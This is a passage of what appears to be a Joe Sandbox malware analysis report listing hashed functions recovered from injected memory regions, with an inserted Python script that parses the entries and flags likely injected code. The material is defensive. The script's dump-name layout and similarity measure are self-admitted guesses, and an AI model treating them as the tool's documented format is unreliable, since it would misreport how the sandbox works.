                                        • Opcode ID: 9cf7d6126f52f47b2ba7f150a6ee6fe715e0bb3c11ce3a4238b511a43bd2aa5c
                                        • Instruction ID: 0b7049300c6d1750c9d224ce1f91fb23bdceeb6077934ff4af50e343500e3275
                                        • Opcode Fuzzy Hash: 9cf7d6126f52f47b2ba7f150a6ee6fe715e0bb3c11ce3a4238b511a43bd2aa5c
                                        • Instruction Fuzzy Hash: 57F0EC307488188F8F88FF28D0A8EA533E1EB79301355419AE40ACB2A5DE21ED85CBC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4cf68a200c66d70a82396e65a3832b10f601d15131bd4cc44eb94aa7f4587559
                                        • Instruction ID: f69acf1d4e8e7b7dfd77670f5b911582c544f051afae83a072bbe33a6573f3b6
                                        • Opcode Fuzzy Hash: 4cf68a200c66d70a82396e65a3832b10f601d15131bd4cc44eb94aa7f4587559
                                        • Instruction Fuzzy Hash: AEF0A9316488188FDF89FF28C09DE6537E1EB797417154099E40ACB6A5DE31ED85CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60e78ea279785d1988a140585c36dac1601b436f91821d6e08e7983b88be1423
                                        • Instruction ID: 246fb3f080dcc1ee38bad3649f3bb8d99fece2b8bd9bb44951de2a1caa926870
                                        • Opcode Fuzzy Hash: 60e78ea279785d1988a140585c36dac1601b436f91821d6e08e7983b88be1423
                                        • Instruction Fuzzy Hash: D0F03031609C084FAA98D7598068EB437D1EB6871176180E6C12BC72B5ED25E846C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b1940a9c0bc12e8969a24d448c39357c33d468c689fdb1829bc81ff311aaa24
                                        • Instruction ID: da43eac74fd936c69b804693a1787cb0b806e4f4988f365b032bfd4f62ab49b7
                                        • Opcode Fuzzy Hash: 2b1940a9c0bc12e8969a24d448c39357c33d468c689fdb1829bc81ff311aaa24
                                        • Instruction Fuzzy Hash: 21F09231348D088FDB85FA68D09CE6573A2FB79301B554469D10AC76A5DE21E986CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4428d141730f284a5e60629f584fd99c7fcd2b479806c082fdca129b3e709d6
                                        • Instruction ID: 6da41c5c5bc230fbea77f24812547f109a534ca7bed08d6ab0d8f827e5c46fb1
                                        • Opcode Fuzzy Hash: d4428d141730f284a5e60629f584fd99c7fcd2b479806c082fdca129b3e709d6
                                        • Instruction Fuzzy Hash: 73011D30D1891D8FDF94EB98C4A4BACB7B1FB68301F6440AAC00DE7295DE31A885CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5c46cba5057aa2ec8ac5aeb4ff9c652e770915af713e1dfbbb02d3bc1aaecef4
                                        • Instruction ID: 08c2065f4c1b40abddc7234077f32aa7b189635ebd708d436510c6ab9868be5d
                                        • Opcode Fuzzy Hash: 5c46cba5057aa2ec8ac5aeb4ff9c652e770915af713e1dfbbb02d3bc1aaecef4
                                        • Instruction Fuzzy Hash: 21F0FE303488088FDF84FF18D098E6533A1FB783007504059D50AC76A5DE31ED85CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc825f1c70f5dc5acc8cfa74aa32036a5410909f0afd1bf089a95186b1253ece
                                        • Instruction ID: f7e85a1f35bc7c8a59078f2471476d1d823299e24bc8aabcafdfbf2bf6f9cbad
                                        • Opcode Fuzzy Hash: cc825f1c70f5dc5acc8cfa74aa32036a5410909f0afd1bf089a95186b1253ece
                                        • Instruction Fuzzy Hash: 93F0A531A5481C8FCF94EA18D894BA9B3B1FBA9301F14449AD00EE3251CA729DC1CF00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40dde85ff6b9a9efa4d802af799023bfb788bec931de938e3489bbe688eb154b
                                        • Instruction ID: a66a24ac7a5db38b3bc8a64aebb540805f8617d459db64a782cc661b02def99a
                                        • Opcode Fuzzy Hash: 40dde85ff6b9a9efa4d802af799023bfb788bec931de938e3489bbe688eb154b
                                        • Instruction Fuzzy Hash: FDD01215A6EC6B47E5A5511A30759FC52C08B4D671F5501F6C42DC72D1CC8C1CD646C1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85657cda84a8dc0e4c30e4bec32f4facf57cde83c3c7b146529c5956270940fe
                                        • Instruction ID: 47490079023076ad6e3699ca390316863a4eea4ef9c32e3a0322786755843062
                                        • Opcode Fuzzy Hash: 85657cda84a8dc0e4c30e4bec32f4facf57cde83c3c7b146529c5956270940fe
                                        • Instruction Fuzzy Hash: C8E0EC30749C0C4FAAC9FA2C806DEB933D2EBE871175500A6E00EC73B5DD24DC868741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8ebd56f5500e1513a138b1f6a9c248b5d27fe0331226180e3734d662c7b9c28
                                        • Instruction ID: 9ec7bf32deed101918e3b1c07c6caea6356f6d2e9b0cb3852b2a82bbbf2349e1
                                        • Opcode Fuzzy Hash: c8ebd56f5500e1513a138b1f6a9c248b5d27fe0331226180e3734d662c7b9c28
                                        • Instruction Fuzzy Hash: 47E0C231558C094FCF98F669E088EE173E0EB28300701449AD41AC72A9DD25DCC1CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d522a8655b12f7e8f7615ec5faac5a88f38d823e4e4a22112020e91e83f8b8d4
                                        • Instruction ID: b72670ca9c0dadcfc3bcfe54038f7833b8ddd51377b7e1074fad2602850c396e
                                        • Opcode Fuzzy Hash: d522a8655b12f7e8f7615ec5faac5a88f38d823e4e4a22112020e91e83f8b8d4
                                        • Instruction Fuzzy Hash: 21D05E327588184FEB44F718E449BA5B3D1EB6432172544A6D00AC71A5ED27D882CB85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc6729a99fd6cd7eedf7b0c5b269987bf5461464952bfed4e1bdbc57fc849197
                                        • Instruction ID: 7e0096707378986465e482cfecf42ce68b519349db9d06e0ac58596ba15b4e3e
                                        • Opcode Fuzzy Hash: dc6729a99fd6cd7eedf7b0c5b269987bf5461464952bfed4e1bdbc57fc849197
                                        • Instruction Fuzzy Hash: 81C04C05B29D0D1B5194EA6C385926D23C2D79C491785127B951EC335ADC55584B0282
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction ID: bda60e5dbb4990e4d815f8040dc27c4bfff39d01b4420feba5e91a47ac173786
                                        • Opcode Fuzzy Hash: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction Fuzzy Hash: C8C08035EDF9174BF994509570228FC7250CF0A330F4420F9C02F86292DCCD18D54641
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d402232c1bcd6b8333358ba7c0a94d0b157e81aeb5d66a9afdadead3ebb30a73
                                        • Instruction ID: 57a52c891f1f3722bedbc7d6677582d8f487022e7410c35ab4cd9692643745fd
                                        • Opcode Fuzzy Hash: d402232c1bcd6b8333358ba7c0a94d0b157e81aeb5d66a9afdadead3ebb30a73
                                        • Instruction Fuzzy Hash: 5FD05E34C2E68DD7DB10DB1194214EC7B20FF41310F2001EAE96D02190CE74675C9682
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2348766926.00007FF7BB311000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7BB310000, based on PE: true
                                        • Associated: 00000002.00000002.2348745932.00007FF7BB310000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.2348791740.00007FF7BB317000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.2348811484.00007FF7BB319000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.2349002071.00007FF7BB58D000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.2349215637.00007FF7BB803000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.2349239244.00007FF7BB805000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff7bb310000_ghghghg.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction ID: d7d209f9384f4ee5cf475677fb0d64aae1cf0debb5ac7d104b151fd91de2c1ae
                                        • Opcode Fuzzy Hash: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction Fuzzy Hash: 59B0926191470984E2007B0D9841298A268BBAA740F800034CA0C03366CABD50408B20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

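An added triage script (my own example, not part of the Joe Sandbox report and not Joe Security's tooling) that reads entries in the format shown above, decodes the .sdmp dump name and flags the regions worth pulling into a disassembler: executable private memory that is not backed by a PE image, which is how the injected or unpacked code of this sample appears in contrast to the image-backed dump of process 2. The field layout of the dump name (process index, stage, dump id, base, protection, unknown, memory type, image index) is an inference from these entries, not documented on this page; the protection and memory type values are the winnt.h constants. The positional hash comparison is a crude heuristic of my own, not Joe Sandbox's similarity metric. The sample input is copied from the entries on this page.

```python
"""Triage helper for the per-function entries of a Joe Sandbox report.

Added example, not Joe Sandbox code. It parses 'Memory Dump Source' entries as
they appear in the report text, decodes the .sdmp dump name and flags regions
that look like injected/unpacked code: executable, MEM_PRIVATE, not PE-backed.
"""
import re

# Windows memory constants from winnt.h (real values).
PAGE_PROTECT = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}

SOURCE_RE = re.compile(r"Source File:\s*(?P<dump>[0-9A-Fa-f.]+)\.sdmp,\s*Offset:\s*"
                       r"(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
SNAPSHOT_RE = re.compile(r"Snapshot File:\s*hcaresult_\d+_\d+_[0-9a-f]+_(?P<proc>.+?)\.jbxd")
FUZZY_RE = re.compile(r"Instruction Fuzzy Hash:\s*(?P<hash>[0-9A-Fa-f]+)")

# Sample input: entries copied from the report (three regions, five functions).
SAMPLE_REPORT = """
Memory Dump Source
• Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
• Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
• Instruction Fuzzy Hash: B5414A3062EA464FD305DA2DC454DA17BE2EFE6311B1885FEE0C9C717BD928E886C741
Memory Dump Source
• Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
• Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
• Instruction Fuzzy Hash: 57217A30348C088FDF89FF58C0ADE6533E2EBB970175041A9D50ACB6A6DE25ED85CB81
Memory Dump Source
• Source File: 00000002.00000002.2348766926.00007FF7BB311000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7BB310000, based on PE: true
• Snapshot File: hcaresult_2_2_7ff7bb310000_ghghghg.jbxd
• Instruction Fuzzy Hash: 59B0926191470984E2007B0D9841298A268BBAA740F800034CA0C03366CABD50408B20
Memory Dump Source
• Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
• Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
• Instruction Fuzzy Hash: 28317C3062DA460FD305DA2DC480DA1B7F2EFE6311B188ABDE0C9C716BD938E8868741
Memory Dump Source
• Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
• Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
• Instruction Fuzzy Hash: DD217C30348D088FDF89FF58D099E6933E1EBA970171041A9D50AC76A6DE25ED85CB85
"""


def decode_dump_name(name):
    """Decode the dotted .sdmp name. Assumed layout (inferred from the report,
    not documented): process index . stage . dump id . base . protection .
    unknown . memory type . image index; every field but the dump id is hex."""
    parts = name.split(".")
    if len(parts) != 8:
        raise ValueError("unexpected sdmp name: " + name)
    protect, mem_type = int(parts[4], 16), int(parts[6], 16)
    return {"process_index": int(parts[0], 16), "base": int(parts[3], 16),
            "protect": protect, "protect_name": PAGE_PROTECT.get(protect, hex(protect)),
            "mem_type": mem_type, "mem_type_name": MEM_TYPE.get(mem_type, hex(mem_type))}


def parse_entries(text):
    """One record per function entry: decoded dump metadata plus its fuzzy hash."""
    entries, current = [], None
    for line in text.splitlines():
        if m := SOURCE_RE.search(line):
            current = decode_dump_name(m.group("dump"))
            current.update(region=m.group("dump"), pe_backed=m.group("pe") == "true")
        elif (m := SNAPSHOT_RE.search(line)) and current:
            current["process"] = m.group("proc")
        elif (m := FUZZY_RE.search(line)) and current:
            entries.append(dict(current, fuzzy=m.group("hash").upper()))
    return entries


def summarize_regions(entries):
    """Group functions by region; a region is suspicious when it is executable,
    MEM_PRIVATE and not backed by a PE image (injected or unpacked code)."""
    regions = {}
    for e in entries:
        r = regions.setdefault(e["region"], {
            "process": e.get("process"), "base": hex(e["base"]),
            "protect": e["protect_name"], "type": e["mem_type_name"],
            "pe_backed": e["pe_backed"], "functions": [],
            "suspicious": e["protect"] in EXECUTABLE
                          and e["mem_type"] == 0x20000 and not e["pe_backed"]})
        r["functions"].append(e["fuzzy"])
    return regions


def fuzzy_similarity(a, b):
    """Positional nibble agreement of two instruction fuzzy hashes. A crude
    heuristic of my own, not Joe Sandbox's similarity metric; it is enough to
    spot the same function recovered from two dumps of the same payload."""
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a, b)) / len(a)


def cross_region_matches(regions, threshold=0.7):
    """Pair functions across suspicious regions whose hashes agree >= threshold."""
    sus = [(n, r) for n, r in regions.items() if r["suspicious"]]
    out = []
    for i, (na, ra) in enumerate(sus):
        for nb, rb in sus[i + 1:]:
            for fa in ra["functions"]:
                for fb in rb["functions"]:
                    s = fuzzy_similarity(fa, fb)
                    if s >= threshold:
                        out.append((na, nb, fa, fb, round(s, 3)))
    return out


if __name__ == "__main__":
    regs = summarize_regions(parse_entries(SAMPLE_REPORT))
    for name, r in regs.items():
        flag = "INJECTED?" if r["suspicious"] else "image"
        print(f"{flag:9} proc={r['process']} base={r['base']} {r['protect']} {r['type']} "
              f"pe={r['pe_backed']} functions={len(r['functions'])}")
    for na, nb, fa, fb, s in cross_region_matches(regs):
        print(f"shared code: {fa[:16]}... ~ {fb[:16]}... similarity={s}")
```

Run against the full report text instead of SAMPLE_REPORT and the two RWX private regions (process index 0 at 0x7FFE167F0000 and process index 19 at 0x7FFE167D0000) come out flagged while the image-backed dump of process 2 does not; the cross-region matches show that the same functions were recovered from both regions, which is what you would expect when the parent and the process it injected into run the same payload.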
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: k_H$k=O_^
                                        • API String ID: 0-1679532271
                                        • Opcode ID: dcf440904b6d56056e3d739330a27cc4ff638ad1ad0beac6f2c4c5279a53390d
                                        • Instruction ID: 784d3e01491c13f5fe41cf3fa5050ae37b4fe9a7af694d5ef37d62f5306c9227
                                        • Opcode Fuzzy Hash: dcf440904b6d56056e3d739330a27cc4ff638ad1ad0beac6f2c4c5279a53390d
                                        • Instruction Fuzzy Hash: 20F01C31D19A0F9FEF519F9698615FD77B1FF483A0F5018BAC10EA21A1DA282845C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: p]pt
                                        • API String ID: 0-1447562928
                                        • Opcode ID: 2cb20229480f945a59ead697e244b539337cb019a990a2f602e91e5ba558ed23
                                        • Instruction ID: 8c30902eefe6d69e72ae16b965b530238bf1aa7e7440e0861ff1ae32071b2eab
                                        • Opcode Fuzzy Hash: 2cb20229480f945a59ead697e244b539337cb019a990a2f602e91e5ba558ed23
                                        • Instruction Fuzzy Hash: 36E1293191ED494BE768D619A8725B477D0FF45332F044AF9D15EC39B2EE29A80E8B80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0#pt
                                        • API String ID: 0-2469598167
                                        • Opcode ID: ec61833722afa440ad90c0db52e41577f525d3479d9970ae40f9384d181bd115
                                        • Instruction ID: 765239c6ed05a713468d665a2327bd486cc588f0d404eeb586e7293413fc030c
                                        • Opcode Fuzzy Hash: ec61833722afa440ad90c0db52e41577f525d3479d9970ae40f9384d181bd115
                                        • Instruction Fuzzy Hash: 3581E431A1CA0D8FE768EA19D895BB973E5FF45321F1045BAD08FC32A1EE25AC478741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: r6ft
                                        • API String ID: 0-2757449517
                                        • Opcode ID: 5b94ee733453f7cb51ec49160f8b0ba5346bba8a218d795f29b4e6989cbcad55
                                        • Instruction ID: dd0124b7fdee3c8ce402c05c5a6cd8f84b10a9bb0180b6bd51cceb79cbe3d551
                                        • Opcode Fuzzy Hash: 5b94ee733453f7cb51ec49160f8b0ba5346bba8a218d795f29b4e6989cbcad55
                                        • Instruction Fuzzy Hash: 7CD09231714D088FEF85EB1CC458EA673E2EBA8705724406AD00AC72A5DE25ED86CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11f4dcfa980a39c70ea8fbef3d37882032c1162a5b9e5d541ac2b9847833f614
                                        • Instruction ID: 3eb0c064ba08f19ce1d50c4bc08da9f94c6e12bd6a7a4c42095edba8494082d6
                                        • Opcode Fuzzy Hash: 11f4dcfa980a39c70ea8fbef3d37882032c1162a5b9e5d541ac2b9847833f614
                                        • Instruction Fuzzy Hash: 1A41E731A0DE098FDB69DE19C85A6A877E1FF84365F0016F9D04DC75B2DE28A81EC781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2381076369.00007FFE167D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ffe167d0000_fgfdgd.jbxd
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2377560662.00007FF750F21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF750F20000, based on PE: true
                                        • Associated: 00000014.00000002.2377507476.00007FF750F20000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000014.00000002.2377844443.00007FF750F27000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000014.00000002.2377862925.00007FF750F29000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000014.00000002.2377880441.00007FF750F2A000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000014.00000002.2378410154.00007FF751197000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000014.00000002.2378809080.00007FF75119D000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000014.00000002.2379442732.00007FF751413000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000014.00000002.2379461487.00007FF751415000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_7ff750f20000_ghghghg.jbxd
                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 36f9eb3e3c6e12615337cebd00f65173e8c12410bc466946f4a09b8363733a6c
                                        • Instruction ID: 825fc3779bcc96411df81efc8420d57f2007f8c9b500cfc25ddafefb45ed203f
                                        • Opcode Fuzzy Hash: 36f9eb3e3c6e12615337cebd00f65173e8c12410bc466946f4a09b8363733a6c
                                        • Instruction Fuzzy Hash: DF01D271B0D9484FD798DA1C94166B8B7D0EF98321B0002BFE44EC3972DE25A9154746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 94bc12787b33f6ad66f759b9b58693911669519f5ce7924cd9c37d3e403291f8
                                        • Instruction ID: 02de814a426658997b78aad1cee7355f71920744dc934a56d042bcccf87b2834
                                        • Opcode Fuzzy Hash: 94bc12787b33f6ad66f759b9b58693911669519f5ce7924cd9c37d3e403291f8
                                        • Instruction Fuzzy Hash: 9A019231208818CFDB89FF18C098E6177A2EBB93057554159D40ACB669DF35ECA4CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5faf1d5fb3fb2d8278ff45dc932f0e5eb8e56c53b58092e23689dbb82e7274ef
                                        • Instruction ID: b0e911a5c46a0a7ad82cd723013c5462a26fe11cc0a7e1d022a45b45ed12992b
                                        • Opcode Fuzzy Hash: 5faf1d5fb3fb2d8278ff45dc932f0e5eb8e56c53b58092e23689dbb82e7274ef
                                        • Instruction Fuzzy Hash: BC011D312088088FDF49FF18C499DA577E2EF793057144199D80ACB2A6DE24ED94CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000028.00000002.2921335935.00007FFE18730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE18730000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_40_2_7ffe18730000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
